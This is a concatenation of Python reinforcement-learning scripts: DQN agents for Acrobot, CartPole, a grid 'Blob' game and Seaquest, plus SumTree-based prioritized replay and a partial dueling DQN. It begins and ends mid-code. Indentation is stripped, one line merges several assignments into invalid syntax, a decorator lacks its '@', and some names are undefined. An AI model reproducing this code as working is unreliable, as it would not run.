# reward = reward if not done else 10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
agent.update_target_model()
break
if e % RENDER_EVERY == 0:
env.render()
rewards += reward
# print(rewards)
all_rewards.append(rewards)
avg_reward = np.mean(all_rewards)
avg_rewards.append(avg_reward)
if e % SHOW_EVERY == 0:
print(f"[{e:4}] avg reward:{avg_reward:.3f} eps: {agent.epsilon:.2f}")
if len(agent.memory) > batch_size:
agent.replay(batch_size)
agent.save("AcroBot_v1.h5")
plt.plot(list(range(EPISODES)), avg_rewards)
plt.show()
import os
# to use CPU uncomment below code
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 1000
REPLAY_MEMORY_MAX = 5000
SHOW_EVERY = 100
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
# model to be built
self.model = None
self.build_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation="relu"))
model.add(Dense(24, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
self.model = model
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
env = gym.make("CartPole-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
done = False
batch_size = 32
scores = []
avg_scores = []
avg_score = 0
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
for t in range(500):
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
reward = reward if not done else -10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
print(f"[{e:4}] avg score:{avg_score:.3f} eps: {agent.epsilon:.2f}")
break
if e % SHOW_EVERY == 0:
env.render()
if len(agent.memory) > batch_size:
agent.replay(batch_size)
scores.append(t)
avg_score = np.average(scores)
avg_scores.append(avg_score)
agent.save("v1.h5")
plt.plot(list(range(EPISODES)), avg_scores)
plt.show()
import numpy as np
import keras.backend.tensorflow_backend as backend
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten, LSTM
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
from tqdm import tqdm
import os
from PIL import Image
import cv2
import itertools
DISCOUNT = 0.96
REPLAY_MEMORY_SIZE = 50_000 # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000 # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 32 # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5 # Terminal states (end of episodes)
MODEL_NAME = '3x128-LSTM-7enemies-'
MIN_REWARD = -200 # For model save
MEMORY_FRACTION = 0.20
# Environment settings
EPISODES = 50_000
# Exploration settings
epsilon = 1.0 # not a constant, going to be decayed
EPSILON_DECAY = 0.999771
MIN_EPSILON = 0.01
# Stats settings
AGGREGATE_STATS_EVERY = 100 # episodes
SHOW_PREVIEW = False
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=0)
elif choice == 1:
self.move(x=-1, y=0)
elif choice == 2:
self.move(x=0, y=1)
elif choice == 3:
self.move(x=0, y=-1)
def move(self, x=False, y=False):
# If no value for x, move randomly
if x is False:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if y is False:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
SIZE = 20
RETURN_IMAGES = False
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
# if RETURN_IMAGES:
# OBSERVATION_SPACE_VALUES = (SIZE, SIZE, 3) # 4
# else:
# OBSERVATION_SPACE_VALUES = (4,)
ACTION_SPACE_SIZE = 4
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, n_enemies=7):
self.n_enemies = n_enemies
self.n_states = len(self.reset())
def reset(self):
self.enemies = []
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
for i in range(self.n_enemies):
enemy = Blob(self.SIZE)
while enemy == self.player or enemy == self.food:
enemy = Blob(self.SIZE)
self.enemies.append(enemy)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
# all blob's coordinates
observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
# set the reward to move penalty by default
reward = -self.MOVE_PENALTY
if self.player == self.food:
# if the player hits the food, good reward
reward = self.FOOD_REWARD
else:
for enemy in self.enemies:
if enemy == self.player:
# if the player hits one of the enemies, heavy punishment
reward = -self.ENEMY_PENALTY
break
done = False
if reward == self.FOOD_REWARD or reward == -self.ENEMY_PENALTY or self.episode_step >= 200:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8) # starts an rbg of our size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # sets the food location tile to green color
for enemy in self.enemies:
env[enemy.x][enemy.y] = self.d[ENEMY_N] # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # sets the player tile to blue
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
env = BlobEnv()
# For stats
ep_rewards = [-200]
# For more repetitive results
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)
# Memory fraction, used mostly when trai8ning multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
def __init__(self, state_in_image=True):
self.state_in_image = state_in_image
# Main model
self.model = self.create_model()
# Target network
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
# An array with last n steps for training
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
# Custom tensorboard object
self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))
# Used to count when to update target network with main network's weights
self.target_update_counter = 0
def create_model(self):
# get the NN input length
model = Sequential()
if self.state_in_image:
model.add(Conv2D(256, (3, 3), input_shape=env.OBSERVATION_SPACE_VALUES)) # OBSERVATION_SPACE_VALUES = (10, 10, 3) a 10x10 RGB image.
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
else:
# model.add(Dense(32, activation="relu", input_shape=(env.n_states,)))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
model.add(LSTM(128, activation="relu", input_shape=(None, env.n_states,), return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=False))
model.add(Dropout(0.3))
model.add(Dense(env.ACTION_SPACE_SIZE, activation='linear')) # ACTION_SPACE_SIZE = how many choices (9)
model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
return model
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self, terminal_state, step):
# Start training only if certain number of samples is already saved
if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
if self.state_in_image:
current_states = np.array([transition[0] for transition in minibatch])/255
else:
current_states = np.array([transition[0] for transition in minibatch])
current_qs_list = self.model.predict(np.expand_dims(current_states, axis=1))
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
if self.state_in_image:
new_current_states = np.array([transition[3] for transition in minibatch])/255
else:
new_current_states = np.array([transition[3] for transition in minibatch])
future_qs_list = self.target_model.predict(np.expand_dims(new_current_states, axis=1))
X = []
y = []
# Now we need to enumerate our batches
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If not a terminal state, get new q from future states, otherwise set it to 0
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state)
y.append(current_qs)
# Fit on all samples as one batch, log only on terminal state
if self.state_in_image:
self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
else:
# self.model.fit(np.array(X), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
self.model.fit(np.expand_dims(X, axis=1), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
# Update target network counter every episode
if terminal_state:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
# Queries main network for Q values given current observation space (environment state)
def get_qs(self, state):
if self.state_in_image:
return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
else:
# return self.model.predict(np.array(state).reshape(1, env.n_states))[0]
return self.model.predict(np.array(state).reshape(1, 1, env.n_states))[0]
agent = DQNAgent(state_in_image=False)
print("Number of states:", env.n_states)
# agent.model.load_weights("models/2x32____22.00max___-2.44avg_-200.00min__1563463022.model")
# Iterate over episodes
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
# Update tensorboard step every episode
agent.tensorboard.step = episode
# Restarting episode - reset episode reward and step number
episode_reward = 0
step = 1
# Reset environment and get initial state
current_state = env.reset()
# Reset flag and start iterating until episode ends
done = False
while not done:
# This part stays mostly the same, the change is to query a model for Q values
if np.random.random() > epsilon:
# Get action from Q table
action = np.argmax(agent.get_qs(current_state))
else:
# Get random action
action = np.random.randint(0, env.ACTION_SPACE_SIZE)
new_state, reward, done = env.step(action)
# Transform new continous state to new discrete state and count reward
episode_reward += reward
if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
env.render()
# Every step we update replay memory and train main network
agent.update_replay_memory((current_state, action, reward, new_state, done))
agent.train(done, step)
current_state = new_state
step += 1
# Append episode reward to a list and log stats (every given number of episodes)
ep_rewards.append(episode_reward)
if not episode % AGGREGATE_STATS_EVERY or episode == 1:
average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:])
min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
# Save model, but only when min reward is greater or equal a set value
if average_reward >= -220:
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# Decay epsilon
if epsilon > MIN_EPSILON:
epsilon *= EPSILON_DECAY
epsilon = max(MIN_EPSILON, epsilon)
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# OpenGym Seaquest-v0
# -------------------
#
# This code demonstrates a Double DQN network with Priority Experience Replay
# in an OpenGym Seaquest-v0 environment.
#
# Made as part of blog series Let's make a DQN, available at:
# https://jaromiru.com/2016/11/07/lets-make-a-dqn-double-learning-and-prioritized-experience-replay/
#
# author: Jaromir Janisch, 2016
import matplotlib
import random, numpy, math, gym, scipy
import tensorflow as tf
import time
from SumTree import SumTree
from keras.callbacks import TensorBoard
from collections import deque
import tqdm
IMAGE_WIDTH = 84
IMAGE_HEIGHT = 84
IMAGE_STACK = 2
HUBER_LOSS_DELTA = 2.0
LEARNING_RATE = 0.00045
#-------------------- Modified Tensorboard -----------------------
class RLTensorBoard(TensorBoard):
def __init__(self, **kwargs):
"""
Overriding init to set initial step and writer (one log file for multiple .fit() calls)
"""
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
def set_model(self, model):
"""
Overriding this method to stop creating default log writer
"""
pass
def on_epoch_end(self, epoch, logs=None):
"""
Overrided, saves logs with our step number
(if this is not overrided, every .fit() call will start from 0th step)
"""
self.update_stats(**logs)
def on_batch_end(self, batch, logs=None):
"""
Overrided, we train for one batch only, no need to save anything on batch end
"""
pass
def on_train_end(self, _):
"""
Overrided, we don't close the writer
"""
pass
def update_stats(self, **stats):
"""
Custom method for saving own metrics
Creates writer, writes custom metrics and closes writer
"""
self._write_logs(stats, self.step)
#-------------------- UTILITIES -----------------------
def huber_loss(y_true, y_pred):
err = y_true - y_pred
cond = K.abs(err) < HUBER_LOSS_DELTA
L2 = 0.5 * K.square(err)
L1 = HUBER_LOSS_DELTA * (K.abs(err) - 0.5 * HUBER_LOSS_DELTA)
loss = tf.where(cond, L2, L1) # Keras does not cover where function in tensorflow :-(
return K.mean(loss)
def processImage( img ):
rgb = scipy.misc.imresize(img, (IMAGE_WIDTH, IMAGE_HEIGHT), interp='bilinear')
r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]
gray = 0.2989 * r + 0.5870 * g + 0.1140 * b # extract luminance
o = gray.astype('float32') / 128 - 1 # normalize
return o
#-------------------- BRAIN ---------------------------
from keras.models import Sequential
from keras.layers import *
from keras.optimizers import *
model_name = "conv2dx3"
class Brain:
def __init__(self, stateCnt, actionCnt):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.model = self._createModel()
self.model_ = self._createModel() # target network
# custom tensorboard
self.tensorboard = RLTensorBoard(log_dir="logs/{}-{}".format(model_name, int(time.time())))
def _createModel(self):
model = Sequential()
model.add(Conv2D(32, (8, 8), strides=(4,4), activation='relu', input_shape=(self.stateCnt), data_format='channels_first'))
model.add(Conv2D(64, (4, 4), strides=(2,2), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Flatten())
model.add(Dense(units=512, activation='relu'))
model.add(Dense(units=actionCnt, activation='linear'))
opt = RMSprop(lr=LEARNING_RATE)
model.compile(loss=huber_loss, optimizer=opt)
return model
def train(self, x, y, epochs=1, verbose=0):
self.model.fit(x, y, batch_size=32, epochs=epochs, verbose=verbose, callbacks=[self.tensorboard])
def predict(self, s, target=False):
if target:
return self.model_.predict(s)
else:
return self.model.predict(s)
def predictOne(self, s, target=False):
return self.predict(s.reshape(1, IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT), target).flatten()
def updateTargetModel(self):
self.model_.set_weights(self.model.get_weights())
#-------------------- MEMORY --------------------------
class Memory: # stored as ( s, a, r, s_ ) in SumTree
e = 0.01
a = 0.6
def __init__(self, capacity):
self.tree = SumTree(capacity)
def _getPriority(self, error):
return (error + self.e) ** self.a
def add(self, error, sample):
p = self._getPriority(error)
self.tree.add(p, sample)
def sample(self, n):
batch = []
segment = self.tree.total() / n
for i in range(n):
a = segment * i
b = segment * (i + 1)
s = random.uniform(a, b)
(idx, p, data) = self.tree.get(s)
batch.append( (idx, data) )
return batch
def update(self, idx, error):
p = self._getPriority(error)
self.tree.update(idx, p)
#-------------------- AGENT ---------------------------
MEMORY_CAPACITY = 50_000
BATCH_SIZE = 32
GAMMA = 0.95
MAX_EPSILON = 1
MIN_EPSILON = 0.05
EXPLORATION_STOP = 500_000 # at this step epsilon will be 0.01
LAMBDA = - math.log(0.01) / EXPLORATION_STOP # speed of decay
UPDATE_TARGET_FREQUENCY = 10_000
UPDATE_STATS_EVERY = 5
RENDER_EVERY = 50
class Agent:
steps = 0
epsilon = MAX_EPSILON
def __init__(self, stateCnt, actionCnt, brain):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.brain = brain
# self.memory = Memory(MEMORY_CAPACITY)
def act(self, s):
if random.random() < self.epsilon:
return random.randint(0, self.actionCnt-1)
else:
return numpy.argmax(self.brain.predictOne(s))
def observe(self, sample): # in (s, a, r, s_) format
x, y, errors = self._getTargets([(0, sample)])
self.memory.add(errors[0], sample)
if self.steps % UPDATE_TARGET_FREQUENCY == 0:
self.brain.updateTargetModel()
# slowly decrease Epsilon based on our eperience
self.steps += 1
self.epsilon = MIN_EPSILON + (MAX_EPSILON - MIN_EPSILON) * math.exp(-LAMBDA * self.steps)
def _getTargets(self, batch):
no_state = numpy.zeros(self.stateCnt)
states = numpy.array([ o[1][0] for o in batch ])
states_ = numpy.array([ (no_state if o[1][3] is None else o[1][3]) for o in batch ])
p = agent.brain.predict(states)
p_ = agent.brain.predict(states_, target=False)
pTarget_ = agent.brain.predict(states_, target=True)
x = numpy.zeros((len(batch), IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT))
y = numpy.zeros((len(batch), self.actionCnt))
errors = numpy.zeros(len(batch))
for i in range(len(batch)):
o = batch[i][1]
s = o[0] a = o[1] r = o[2] s_ = o[3]
t = p[i]
oldVal = t[a]
if s_ is None:
t[a] = r
else:
t[a] = r + GAMMA * pTarget_[i][ numpy.argmax(p_[i]) ] # double DQN
x[i] = s
y[i] = t
errors[i] = abs(oldVal - t[a])
return (x, y, errors)
def replay(self):
batch = self.memory.sample(BATCH_SIZE)
x, y, errors = self._getTargets(batch)
# update errors
for i in range(len(batch)):
idx = batch[i][0]
self.memory.update(idx, errors[i])
self.brain.train(x, y)
class RandomAgent:
memory = Memory(MEMORY_CAPACITY)
exp = 0
epsilon = MAX_EPSILON
def __init__(self, actionCnt, brain):
self.actionCnt = actionCnt
self.brain = brain
def act(self, s):
return random.randint(0, self.actionCnt-1)
def observe(self, sample): # in (s, a, r, s_) format
error = abs(sample[2]) # reward
self.memory.add(error, sample)
self.exp += 1
def replay(self):
pass
#-------------------- ENVIRONMENT ---------------------
class Environment:
def __init__(self, problem):
self.problem = problem
self.env = gym.make(problem)
self.ep_rewards = deque(maxlen=UPDATE_STATS_EVERY)
def run(self, agent, step):
img = self.env.reset()
w = processImage(img)
s = numpy.array([w, w])
agent.brain.tensorboard.step = step
R = 0
while True:
if step % RENDER_EVERY == 0:
self.env.render()
a = agent.act(s)
img, r, done, info = self.env.step(a)
s_ = numpy.array([s[1], processImage(img)]) #last two screens
r = np.clip(r, -1, 1) # clip reward to [-1, 1]
if done: # terminal state
s_ = None
agent.observe( (s, a, r, s_) )
agent.replay()
s = s_
R += r
if done:
break
self.ep_rewards.append(R)
avg_reward = sum(self.ep_rewards) / len(self.ep_rewards)
if step % UPDATE_STATS_EVERY == 0:
min_reward = min(self.ep_rewards)
max_reward = max(self.ep_rewards)
agent.brain.tensorboard.update_stats(reward_avg=avg_reward, reward_min=min_reward, reward_max=max_reward, epsilon=agent.epsilon)
agent.brain.model.save(f"models/{model_name}-avg-{avg_reward:.2f}-min-{min_reward:.2f}-max-{max_reward:2f}.h5")
# print("Total reward:", R)
return avg_reward
#-------------------- MAIN ----------------------------
PROBLEM = 'Seaquest-v0'
env = Environment(PROBLEM)
episodes = 2_000
stateCnt = (IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT)
actionCnt = env.env.action_space.n
brain = Brain(stateCnt, actionCnt)
agent = Agent(stateCnt, actionCnt, brain)
randomAgent = RandomAgent(actionCnt, brain)
step = 0
try:
print("Initialization with random agent...")
while randomAgent.exp < MEMORY_CAPACITY:
step += 1
env.run(randomAgent, step)
print(randomAgent.exp, "/", MEMORY_CAPACITY)
agent.memory = randomAgent.memory
randomAgent = None
print("Starting learning")
for i in tqdm.tqdm(list(range(step+1, episodes+step+1))):
env.run(agent, i)
finally:
agent.brain.model.save("Seaquest-DQN-PER.h5")
import numpy as np
class SumTree:
"""
This SumTree code is modified version of Morvan Zhou:
https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/blob/master/contents/5.2_Prioritized_Replay_DQN/RL_brain.py
"""
data_pointer = 0
def __init__(self, length):
# number of leaf nodes (final nodes that contains experiences)
self.length = length
# generate the tree with all nodes' value = 0
# binary node (each node has max 2 children) so 2x size of leaf capacity - 1
# parent nodes = length - 1
# leaf nodes = length
self.tree = np.zeros(2*self.length - 1)
# contains the experiences
self.data = np.zeros(self.length, dtype=object)
def add(self, priority, data):
"""
Add priority score in the sumtree leaf and add the experience in data
"""
# look at what index we want to put the experience
tree_index = self.data_pointer + self.length - 1
#tree:
# 0
# / \
# 0 0
# / \ / \
#tree_index 0 0 0 We fill the leaves from left to right
self.data[self.data_pointer] = data
# update the leaf
self.update(tree_index, priority)
# increment data pointer
self.data_pointer += 1
# if we're above the capacity, we go back to the first index
if self.data_pointer >= self.length:
self.data_pointer = 0
def update(self, tree_index, priority):
"""
Update the leaf priority score and propagate the change through the tree
"""
# change = new priority score - former priority score
change = priority - self.tree[tree_index]
self.tree[tree_index] = priority
while tree_index != 0: # this method is faster than the recursive loop in the reference code
"""
Here we want to access the line above
THE NUMBERS IN THIS TREE ARE THE INDEXES NOT THE PRIORITY VALUES
0
/ \
1 2
/ \ / \
3 4 5 [6]
If we are in leaf at index 6, we updated the priority score
We need then to update index 2 node
So tree_index = (tree_index - 1) // 2
tree_index = (6-1)//2
tree_index = 2 (because // round the result)
"""
tree_index = (tree_index - 1) // 2
self.tree[tree_index] += change
"""
Here we get the leaf_index, priority value of that leaf and experience associated with that index
"""
def get_leaf(self, v):
"""
Tree structure and array storage:
Tree index:
0 -> storing priority sum
/ \
1 2
/ \ / \
3 4 5 6 -> storing priority for experiences
Array type for storing:
[0,1,2,3,4,5,6]
"""
parent_index = 0
while True: # the while loop is faster than the method in the reference code
left_child_index = 2 * parent_index + 1
right_child_index = left_child_index + 1
# If we reach bottom, end the search
if left_child_index >= len(self.tree):
leaf_index = parent_index
break
else: # downward search, always search for a higher priority node
if v <= self.tree[left_child_index]:
parent_index = left_child_index
else:
v -= self.tree[left_child_index]
parent_index = right_child_index
data_index = leaf_index - self.length + 1
return leaf_index, self.tree[leaf_index], self.data[data_index]
property
def total_priority(self):
return self.tree[0] # Returns the root node
class Memory:
# we use this to avoid some experiences to have 0 probability of getting picked
PER_e = 0.01
# we use this to make a tradeoff between taking only experiences with high priority
# and sampling randomly
PER_a = 0.6
# we use this for importance sampling, from this to 1 through the training
PER_b = 0.4
PER_b_increment_per_sample = 0.001
absolute_error_upper = 1.0
def __init__(self, capacity):
# the tree is composed of a sum tree that contains the priority scores and his leaf
# and also a data list
# we don't use deque here because it means that at each timestep our experiences change index by one
# we prefer to use a simple array to override when the memory is full
self.tree = SumTree(length=capacity)
def store(self, experience):
"""
Store a new experience in our tree
Each new experience have a score of max_priority (it'll be then improved)
"""
# find the max priority
max_priority = np.max(self.tree.tree[-self.tree.length:])
# if the max priority = 0 we cant put priority = 0 since this exp will never have a chance to be picked
# so we use a minimum priority
if max_priority == 0:
max_priority = self.absolute_error_upper
# set the max p for new p
self.tree.add(max_priority, experience)
def sample(self, n):
"""
- First, to sample a minimatch of k size, the range [0, priority_total] is / into k ranges.
- then a value is uniformly sampled from each range
- we search in the sumtree, the experience where priority score correspond to sample values are
retrieved from.
- then, we calculate IS weights for each minibatch element
"""
# create a sample list that will contains the minibatch
memory = []
b_idx, b_is_weights = np.zeros((n, ), dtype=np.int32), np.zeros((n, 1), dtype=np.float32)
# calculate the priority segment
# here, as explained in the paper, we divide the range [0, ptotal] into n ranges
priority_segment = self.tree.total_priority / n
# increase b each time
self.PER_b = np.min([1., self.PER_b + self.PER_b_increment_per_sample])
# calculating the max weight
p_min = np.min(self.tree.tree[-self.tree.length:]) / self.tree.total_priority
max_weight = (p_min * n) ** (-self.PER_b)
for i in range(n):
a, b = priority_segment * i, priority_segment * (i + 1)
value = np.random.uniform(a, b)
# experience that correspond to each value is retrieved
index, priority, data = self.tree.get_leaf(value)
# P(j)
sampling_probs = priority / self.tree.total_priority
# IS = (1/N * 1/P(i))**b /max wi == (N*P(i))**-b /max wi
b_is_weights[i, 0] = np.power(n * sampling_probs, -self.PER_b)/ max_weight
b_idx[i]= index
experience = [data]
memory.append(experience)
return b_idx, memory, b_is_weights
def batch_update(self, tree_idx, abs_errors):
"""
Update the priorities on the tree
"""
abs_errors += self.PER_e
clipped_errors = np.min([abs_errors, self.absolute_error_upper])
ps = np.power(clipped_errors, self.PER_a)
for ti, p in zip(tree_idx, ps):
self.tree.update(ti, p)
import tensorflow as tf
class DDDQNNet:
""" Dueling Double Deep Q Neural Network """
def __init__(self, state_size, action_size, learning_rate, name):
self.state_size = state_size
self.action_size = action_size
self.learning_rate = learning_rate
self.name = name
# we use tf.variable_scope to know which network we're using (DQN or the Target net)
# it'll be helpful when we will update our w- parameters (by copy the DQN parameters)
with tf.variable_scope(self.name):
# we create the placeholders
self.inputs_ = tf.placeholder(tf.float32, [None, *state_size], name="inputs")
self.is_weights_ = tf.placeholder(tf.float32, [None, 1], name="is_weights")
self.actions_ = tf.placeholder(tf.float32, [None, self.action_size], name="actions_")
# target Q
self.target_q = tf.placeholder(tf.float32, [None], name="target")
# neural net
self.dense1 = tf.layers.dense(inputs=self.inputs_,
units=32,
name="dense1",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense2 = tf.layers.dense(inputs=self.dense1,
units=32,
name="dense2",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense3 = tf.layers.dense(inputs=self.dense2,
units=32,
name="dense3",
kernel_initializer=tf.contrib.layers.xavier_initializer())
# here we separate into two streams (dueling)
# this one is State-Function V(s)
self.value = tf.layers.dense(inputs=self.dense3,
units=1,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation=None,
name="value"
)
# and this one is Value-Function A(s, a)
self.advantage = tf.layers.dense(inputs=self.dense3,
units=self.action_size,
activation=None,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="advantage"
)
# aggregation
